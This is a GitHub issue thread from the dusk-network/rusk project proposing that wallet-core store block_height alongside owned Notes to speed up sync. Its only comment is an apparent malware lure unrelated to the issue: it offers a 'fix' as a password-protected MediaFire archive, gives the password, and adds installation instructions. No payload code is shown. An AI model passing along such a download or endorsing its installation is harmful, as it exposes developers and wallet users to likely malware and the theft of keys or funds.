### ISSUE TITLE
wallet-core: Also store `block_height` in the owned `Note`s map

### ISSUE THREAD

**Issue by moCello** [dusk-network/rusk#2227]
#### Summary
In `map_owned` we store the `Note`s for a key together with their nullifiers. For faster sync we will also need the blockheight for each `Note`.

#### Possible solution design or implementation
Define the `EnrichedNote` type from both the `test-wallet` and `rusk-wallet` in `wallet-core` directly.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
